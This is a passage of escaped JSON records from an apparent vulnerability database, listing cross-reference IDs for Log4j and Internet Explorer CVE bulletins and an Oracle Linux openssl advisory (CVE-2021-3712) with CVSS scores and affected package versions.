&quot;B7D137AD-216F-5D27-9D7B-6F3B5EEB266D&quot;, &quot;F5CEF191-B04C-5FC5-82D1-3B728EC648A9&quot;, &quot;B9C2639D-9C07-5F11-B663-C144F457A9F7&quot;, &quot;C6493FD0-579F-593F-A1E9-A44793F70419&quot;, &quot;8B907536-B213-590D-81B9-32CF4A55322E&quot;, &quot;6BC80C90-569E-5084-8C0E-891F12F1805E&quot;, &quot;CC6DFDC6-184F-5748-A9EC-946E8BA5FB04&quot;, &quot;7DE60C34-40B8-50E4-B1A0-FC1D10F97677&quot;, &quot;0E965070-1EAE-59AA-86E6-41ADEFDAED7D&quot;, &quot;8CD90173-6341-5FAD-942A-A9617561026A&quot;, &quot;FBB2DA29-1A11-5D78-A28C-1BF3821613AC&quot;, &quot;AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F&quot;, &quot;DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0&quot;, &quot;7643EC22-CCD0-56A6-9113-B5EF435E22FC&quot;, &quot;0990FE6E-7DC3-559E-9B84-E739872B988C&quot;, &quot;72881C31-5BFD-5DAF-9D20-D6170EEC520D&quot;, &quot;28B1FAAB-984F-5469-BC0D-3861F3BCF3B5&quot;, &quot;37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E&quot;, &quot;88EFCA30-5DED-59FB-A476-A92F53D1497E&quot;, &quot;29AB2E6A-3E44-55A2-801D-2971FABB2E5D&quot;, &quot;111C9F44-593D-5E56-8040-615B48ED3E24&quot;, &quot;0E388E09-F00E-58B6-BEFE-026913357CE0&quot;, &quot;0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC&quot;, &quot;FF761088-559C-5E71-A5CD-196D4E4571B8&quot;, &quot;588DA6EE-E603-5CF2-A9A3-47E98F68926C&quot;, &quot;9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A&quot;, &quot;7333A285-768C-5AD9-B64E-0EC75F075597&quot;]}, {&quot;type&quot;: &quot;mscve&quot;, &quot;idList&quot;: [&quot;MS:CVE-2021-40444&quot;]}, {&quot;type&quot;: &quot;mskb&quot;, &quot;idList&quot;: [&quot;KB5005563&quot;]}, {&quot;type&quot;: &quot;threatpost&quot;, &quot;idList&quot;: [&quot;THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD&quot;, &quot;THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48&quot;]}, {&quot;type&quot;: &quot;malwarebytes&quot;, &quot;idList&quot;: [&quot;MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66&quot;, &quot;MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B&quot;]}, {&quot;type&quot;: &quot;zdt&quot;, &quot;idList&quot;: [&quot;1337DAY-ID-37126&quot;]}, {&quot;type&quot;: &quot;packetstorm&quot;, &quot;idList&quot;: [&quot;PACKETSTORM:165214&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12391&quot;, &quot;KLA12278&quot;, &quot;KLA12277&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;650734B2-7665-4170-9A0A-EECED5E10A5E&quot;]}, {&quot;type&quot;: &quot;github&quot;, &quot;idList&quot;: [&quot;GHSA-7RJR-3Q55-VV33&quot;]}], &quot;modified&quot;: &quot;2021-12-22T08:37:36&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 4.6, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-22T08:37:36&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;}, &quot;lastseen&quot;: &quot;2021-12-22T08:37:36&quot;, &quot;differentElements&quot;: [&quot;description&quot;, &quot;modified&quot;], &quot;edition&quot;: 1}], &quot;viewCount&quot;: 26, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-45046&quot;, &quot;CVE-2021-40444&quot;]}, {&quot;type&quot;: &quot;attackerkb&quot;, &quot;idList&quot;: [&quot;AKB:398CAD69-31E4-4276-B510-D93B2C648A74&quot;, &quot;AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:2590785192528609562&quot;, &quot;KITPLOIT:3697667464193804316&quot;, &quot;KITPLOIT:6759391622067035795&quot;, &quot;KITPLOIT:5184284878903042540&quot;, &quot;KITPLOIT:5230148353750207837&quot;, &quot;KITPLOIT:942518396640901655&quot;, &quot;KITPLOIT:4033244480100620751&quot;, &quot;KITPLOIT:4074521293617632933&quot;, &quot;KITPLOIT:698315176468431184&quot;, &quot;KITPLOIT:3456474172768099634&quot;, &quot;KITPLOIT:5187040326820919368&quot;, &quot;KITPLOIT:1624142243530526923&quot;, &quot;KITPLOIT:5550923684662771880&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;securelist&quot;, &quot;idList&quot;: [&quot;SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656&quot;, &quot;SECURELIST:63306FA6D056BD9A04969409AC790D84&quot;]}, {&quot;type&quot;: &quot;cisa&quot;, &quot;idList&quot;: [&quot;CISA:C70D91615E3DC8B589B493118D474566&quot;]}, {&quot;type&quot;: &quot;mssecure&quot;, &quot;idList&quot;: [&quot;MSSECURE:795E0A765679492C51FEFA2B19EAD597&quot;]}, {&quot;type&quot;: &quot;checkpoint_advisories&quot;, &quot;idList&quot;: [&quot;CPAI-2021-0936&quot;, &quot;CPAI-2021-0554&quot;]}, {&quot;type&quot;: &quot;mmpc&quot;, &quot;idList&quot;: [&quot;MMPC:795E0A765679492C51FEFA2B19EAD597&quot;]}, {&quot;type&quot;: &quot;trendmicroblog&quot;, &quot;idList&quot;: [&quot;TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2&quot;, &quot;TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN&quot;, &quot;APACHE_LOG4J_2_16_0_MAC.NASL&quot;, &quot;SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL&quot;, &quot;APACHE_LOG4J_2_16_0.NASL&quot;, &quot;SMB_NT_MS21_IE_SEPT_2021.NASL&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K32171392&quot;]}, {&quot;type&quot;: &quot;thn&quot;, &quot;idList&quot;: [&quot;THN:B078A239291615ADE17044ED56E2347B&quot;, &quot;THN:602D65D576B090BAC4B0C96998F8F922&quot;, &quot;THN:D4E86BD8938D3B2E15104CA4922A51F8&quot;, &quot;THN:1E1BEA193C556F91F471CD5B785B85B3&quot;, &quot;THN:5D8CEBFFF41D128545CD83F6F45D68F4&quot;, &quot;THN:FADB0A82C9DCE0870E617D4A8E5A34A6&quot;, &quot;THN:7A9C39D8DACC3A4C7336ECA18FD3D889&quot;, &quot;THN:C4188C7A44467E425407D33067C14094&quot;, &quot;THN:F8D94BE25D6D25E0F52FB4433E619721&quot;, &quot;THN:59AE75C78D4644BFA6AD90225B3DE0C1&quot;, &quot;THN:6E47D45D685F44083BE0A6763799D209&quot;, &quot;THN:7192158FCB73BD803AF179B755D61CD1&quot;, &quot;THN:36D12A8768EE450B36B1C8D186F023E5&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423&quot;, &quot;B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA&quot;]}, {&quot;type&quot;: &quot;vmware&quot;, &quot;idList&quot;: [&quot;VMSA-2021-0028.6&quot;, &quot;VMSA-2021-0028.7&quot;, &quot;VMSA-2021-0028.3&quot;, &quot;VMSA-2021-0028.4&quot;]}, {&quot;type&quot;: &quot;citrix&quot;, &quot;idList&quot;: [&quot;CTX335705&quot;]}, {&quot;type&quot;: &quot;paloalto&quot;, &quot;idList&quot;: [&quot;PA-CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:AE824D3989C792700A622C455D8EE160&quot;]}, {&quot;type&quot;: &quot;krebs&quot;, &quot;idList&quot;: [&quot;KREBS:409088FC2DFC219B74043104C2B672CC&quot;]}, {&quot;type&quot;: &quot;githubexploit&quot;, &quot;idList&quot;: [&quot;C6493FD0-579F-593F-A1E9-A44793F70419&quot;, &quot;E06577DB-A581-55E1-968E-81430C294A84&quot;, &quot;DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0&quot;, &quot;7643EC22-CCD0-56A6-9113-B5EF435E22FC&quot;, &quot;6BC80C90-569E-5084-8C0E-891F12F1805E&quot;, &quot;0990FE6E-7DC3-559E-9B84-E739872B988C&quot;, &quot;FF761088-559C-5E71-A5CD-196D4E4571B8&quot;, &quot;588DA6EE-E603-5CF2-A9A3-47E98F68926C&quot;, &quot;0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC&quot;, &quot;88EFCA30-5DED-59FB-A476-A92F53D1497E&quot;, &quot;8CD90173-6341-5FAD-942A-A9617561026A&quot;, &quot;9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A&quot;, &quot;37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E&quot;, &quot;72881C31-5BFD-5DAF-9D20-D6170EEC520D&quot;, &quot;29AB2E6A-3E44-55A2-801D-2971FABB2E5D&quot;, &quot;B7D137AD-216F-5D27-9D7B-6F3B5EEB266D&quot;, &quot;AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F&quot;, &quot;0E965070-1EAE-59AA-86E6-41ADEFDAED7D&quot;, &quot;111C9F44-593D-5E56-8040-615B48ED3E24&quot;, &quot;28B1FAAB-984F-5469-BC0D-3861F3BCF3B5&quot;, &quot;B9C2639D-9C07-5F11-B663-C144F457A9F7&quot;, &quot;7DE60C34-40B8-50E4-B1A0-FC1D10F97677&quot;, &quot;24DE1902-4427-5442-BF63-7657293966E2&quot;, &quot;FBB2DA29-1A11-5D78-A28C-1BF3821613AC&quot;, &quot;0E388E09-F00E-58B6-BEFE-026913357CE0&quot;, &quot;F5CEF191-B04C-5FC5-82D1-3B728EC648A9&quot;, &quot;CC6DFDC6-184F-5748-A9EC-946E8BA5FB04&quot;, &quot;8B907536-B213-590D-81B9-32CF4A55322E&quot;, &quot;7333A285-768C-5AD9-B64E-0EC75F075597&quot;]}, {&quot;type&quot;: &quot;mscve&quot;, &quot;idList&quot;: [&quot;MS:CVE-2021-40444&quot;]}, {&quot;type&quot;: &quot;mskb&quot;, &quot;idList&quot;: [&quot;KB5005563&quot;]}, {&quot;type&quot;: &quot;threatpost&quot;, &quot;idList&quot;: [&quot;THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD&quot;, &quot;THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48&quot;]}, {&quot;type&quot;: &quot;malwarebytes&quot;, &quot;idList&quot;: [&quot;MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B&quot;, &quot;MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12277&quot;, &quot;KLA12278&quot;, &quot;KLA12391&quot;]}, {&quot;type&quot;: &quot;packetstorm&quot;, &quot;idList&quot;: [&quot;PACKETSTORM:165214&quot;]}, {&quot;type&quot;: &quot;zdt&quot;, &quot;idList&quot;: [&quot;1337DAY-ID-37126&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;650734B2-7665-4170-9A0A-EECED5E10A5E&quot;]}], &quot;modified&quot;: &quot;2021-12-23T06:37:35&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 4.9, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T06:37:35&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;_object_type&quot;: &quot;robots.models.thn.ThnBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.thn.ThnBulletin&quot;, &quot;robots.models.base.Bulletin&quot;]}], &quot;oraclelinux&quot;: [{&quot;id&quot;: &quot;ELSA-2021-9632&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;090378ef4652faff896475444a0a814c&quot;, &quot;type&quot;: &quot;oraclelinux&quot;, &quot;bulletinFamily&quot;: &quot;unix&quot;, &quot;title&quot;: &quot;openssl security update&quot;, &quot;description&quot;: &quot;[1:1.1.1k-5]\n- CVE-2021-3712 openssl: Read buffer overruns processing ASN.1 strings\n- Resolves: rhbz#2005400&quot;, &quot;published&quot;: &quot;2021-12-23T00:00:00&quot;, &quot;modified&quot;: &quot;2021-12-23T00:00:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 5.8, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:P/I:N/A:P&quot;}, &quot;cvss2&quot;: {&quot;acInsufInfo&quot;: false, &quot;cvssV2&quot;: {&quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;PARTIAL&quot;, &quot;baseScore&quot;: 5.8, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:P/I:N/A:P&quot;, &quot;version&quot;: &quot;2.0&quot;}, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 4.9, &quot;obtainAllPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;severity&quot;: &quot;MEDIUM&quot;, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;attackComplexity&quot;: &quot;HIGH&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 7.4, &quot;baseSeverity&quot;: &quot;HIGH&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;UNCHANGED&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H&quot;, &quot;version&quot;: &quot;3.1&quot;}, &quot;exploitabilityScore&quot;: 2.2, &quot;impactScore&quot;: 5.2}, &quot;href&quot;: &quot;http://linux.oracle.com/errata/ELSA-2021-9632.html&quot;, &quot;reporter&quot;: &quot;OracleLinux&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-3712&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T16:28:11&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-3712&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-3712&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-3712&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-3712&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K19559038&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;E5B87A13371E713ADEF3FE7406AE533F7BBE73CA43581E79D929A91E3864ECDC&quot;, &quot;4D0EBCF3DF78259432BD61BF337DCCFDB5C99816A483EBDEDA43077F798CF875&quot;, &quot;4EA0B21CBC1507E92BCBE50A7BEAF54CC9CB28005D7893FBDEBD48FF2E06CF9A&quot;, &quot;B1A7EA382E1811C14DF51844F0D630A15CC26815C0D6C2E6A724EFCC852D8689&quot;]}, {&quot;type&quot;: &quot;cloudlinux&quot;, &quot;idList&quot;: [&quot;CLSA-2021:1632262317&quot;]}, {&quot;type&quot;: &quot;almalinux&quot;, &quot;idList&quot;: [&quot;ALSA-2021:5226&quot;]}, {&quot;type&quot;: &quot;amazon&quot;, &quot;idList&quot;: [&quot;ALAS2-2021-1721&quot;, &quot;ALAS2-2021-1714&quot;, &quot;ALAS-2021-1541&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;SUSE_SU-2021-2852-1.NASL&quot;, &quot;CENTOS8_RHSA-2021-5226.NASL&quot;, &quot;SUSE_SU-2021-2829-1.NASL&quot;, &quot;UBUNTU_USN-5051-2.NASL&quot;, &quot;EULEROS_SA-2021-2770.NASL&quot;, &quot;EULEROS_SA-2021-2625.NASL&quot;, &quot;EULEROS_SA-2021-2666.NASL&quot;, &quot;EULEROS_SA-2021-2639.NASL&quot;, &quot;OPENSUSE-2021-2966.NASL&quot;, &quot;PHOTONOS_PHSA-2021-2_0-0383_OPENSSL.NASL&quot;, &quot;OPENSUSE-2021-1261.NASL&quot;, &quot;SUSE_SU-2021-2995-1.NASL&quot;, &quot;SUSE_SU-2021-2826-1.NASL&quot;, &quot;OPENSUSE-2021-2827.NASL&quot;, &quot;UBUNTU_USN-5051-1.NASL&quot;, &quot;EULEROS_SA-2021-2717.NASL&quot;, &quot;EULEROS_SA-2021-2668.NASL&quot;, &quot;OPENSSL_1_0_2ZA.NASL&quot;, &quot;OPENSUSE-2021-1248.NASL&quot;, &quot;SUSE_SU-2021-2967-1.NASL&quot;, &quot;PHOTONOS_PHSA-2021-4_0-0094_OPENSSL.NASL&quot;, &quot;FREEBSD_PKG_96811D4A04EC11EC9B84D4C9EF517024.NASL&quot;, &quot;OPENSUSE-2021-1188.NASL&quot;, &quot;SUSE_SU-2021-2833-1.NASL&quot;, &quot;SUSE_SU-2021-14791-1.NASL&quot;, &quot;PHOTONOS_PHSA-2021-3_0-0290_OPENSSL.NASL&quot;, &quot;EULEROS_SA-2021-2733.NASL&quot;, &quot;SUSE_SU-2021-2996-1.NASL&quot;, &quot;OPENSSL_1_1_1L.NASL&quot;, &quot;EULEROS_SA-2021-2692.NASL&quot;, &quot;OPENSUSE-2021-1189.NASL&quot;, &quot;DEBIAN_DLA-2774.NASL&quot;, &quot;SUSE_SU-2021-2994-1.NASL&quot;, &quot;DEBIAN_DLA-2766.NASL&quot;, &quot;SUSE_SU-2021-3019-1.NASL&quot;, &quot;SUSE_SU-2021-2966-1.NASL&quot;, &quot;F5_BIGIP_SOL19559038.NASL&quot;, &quot;OPENSUSE-2021-2994.NASL&quot;, &quot;SUSE_SU-2021-3144-1.NASL&quot;, &quot;ORACLELINUX_ELSA-2021-5226.NASL&quot;, &quot;PHOTONOS_PHSA-2021-1_0-0429_OPENSSL.NASL&quot;, &quot;SUSE_SU-2021-2825-1.NASL&quot;, &quot;REDHAT-RHSA-2021-5226.NASL&quot;, &quot;SUSE_SU-2021-14792-1.NASL&quot;, &quot;SUSE_SU-2021-2827-1.NASL&quot;, &quot;SUSE_SU-2021-2831-1.NASL&quot;, &quot;SUSE_SU-2021-2830-1.NASL&quot;, &quot;SUSE_SU-2021-2968-1.NASL&quot;, &quot;SECURITYCENTER_OPENSSL_1_1_1L_TNS_2021_16.NASL&quot;, &quot;SUSE_SU-2021-14802-1.NASL&quot;, &quot;PHOTONOS_PHSA-2021-2_0-0383_NXTGN.NASL&quot;, &quot;DEBIAN_DSA-4963.NASL&quot;, &quot;ALA_ALAS-2021-1541.NASL&quot;, &quot;SUSE_SU-2021-14801-1.NASL&quot;, &quot;AL2_ALAS-2021-1714.NASL&quot;, &quot;PHOTONOS_PHSA-2021-3_0-0290_NXTGN.NASL&quot;, &quot;AL2_ALAS-2021-1721.NASL&quot;, &quot;UBUNTU_USN-5051-3.NASL&quot;, &quot;OPENSUSE-2021-2830.NASL&quot;, &quot;EULEROS_SA-2021-2667.NASL&quot;]}, {&quot;type&quot;: &quot;ubuntu&quot;, &quot;idList&quot;: [&quot;USN-5051-2&quot;, &quot;USN-5051-1&quot;, &quot;USN-5051-4&quot;, &quot;USN-5051-3&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:1189-1&quot;, &quot;OPENSUSE-SU-2021:2994-1&quot;, &quot;OPENSUSE-SU-2021:1248-1&quot;, &quot;OPENSUSE-SU-2021:1261-1&quot;, &quot;OPENSUSE-SU-2021:2827-1&quot;, &quot;OPENSUSE-SU-2021:2966-1&quot;, &quot;OPENSUSE-SU-2021:1188-1&quot;, &quot;OPENSUSE-SU-2021:2830-1&quot;]}, {&quot;type&quot;: &quot;debian&quot;, &quot;idList&quot;: [&quot;DEBIAN:DSA-4963-1:90BFC&quot;, &quot;DEBIAN:DLA-2766-1:9EFDC&quot;, &quot;DEBIAN:DLA-2774-1:D8CE0&quot;, &quot;DEBIAN:DSA-4963-1:DA7BC&quot;]}, {&quot;type&quot;: &quot;redhat&quot;, &quot;idList&quot;: [&quot;RHSA-2021:5226&quot;]}, {&quot;type&quot;: &quot;photon&quot;, &quot;idList&quot;: [&quot;PHSA-2021-3.0-0290&quot;, &quot;PHSA-2021-1.0-0429&quot;]}, {&quot;type&quot;: &quot;oraclelinux&quot;, &quot;idList&quot;: [&quot;ELSA-2021-5226&quot;]}, {&quot;type&quot;: &quot;openssl&quot;, &quot;idList&quot;: [&quot;OPENSSL:CVE-2021-3712&quot;]}, {&quot;type&quot;: &quot;cloudfoundry&quot;, &quot;idList&quot;: [&quot;CFOUNDRY:5FED86D0D8C258D157F6DA659FC59DF3&quot;, &quot;CFOUNDRY:9D68ED6016BE103A2C54B6BFC20E2063&quot;]}, {&quot;type&quot;: &quot;thn&quot;, &quot;idList&quot;: [&quot;THN:3AB82AD3C4EB492FE308B1276534EBD7&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;96811D4A-04EC-11EC-9B84-D4C9EF517024&quot;]}], &quot;modified&quot;: &quot;2021-12-23T16:28:11&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 5.3, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T16:28:11&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;src&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-1.1.1k-5.ksplice1.el8_5.src.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-1.1.1k-5.ksplice1.el8_5.aarch64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-debugsource-1.1.1k-5.ksplice1.el8_5.aarch64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-debugsource&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-devel-1.1.1k-5.ksplice1.el8_5.aarch64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-devel&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-libs-1.1.1k-5.ksplice1.el8_5.aarch64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-libs&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-perl-1.1.1k-5.ksplice1.el8_5.aarch64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-perl&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-static-1.1.1k-5.ksplice1.el8_5.aarch64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-static&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;src&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-1.1.1k-5.ksplice1.el8_5.src.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-1.1.1k-5.ksplice1.el8_5.x86_64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;i686&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-devel-1.1.1k-5.ksplice1.el8_5.i686.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-devel&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-devel-1.1.1k-5.ksplice1.el8_5.x86_64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-devel&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;i686&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-libs-1.1.1k-5.ksplice1.el8_5.i686.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-libs&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-libs-1.1.1k-5.ksplice1.el8_5.x86_64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-libs&quot;}, {&quot;OS&quot;: &quot;oracle linux&quot;, &quot;OSVersion&quot;: &quot;8&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;packageVersion&quot;: &quot;1.1.1k-5.ksplice1.el8_5&quot;, &quot;packageFilename&quot;: &quot;openssl-perl-1.1.1k-5.ksplice1.el8_5.x86_64.rpm&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageName&quot;: &quot;openssl-perl&quot;}], &quot;_object_type&quot;: &quot;robots.models.oraclelinux.OracleLinuxBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.oraclelinux.OracleLinuxBulletin&quot;]}], &quot;packetstorm&quot;: [{&quot;id&quot;: 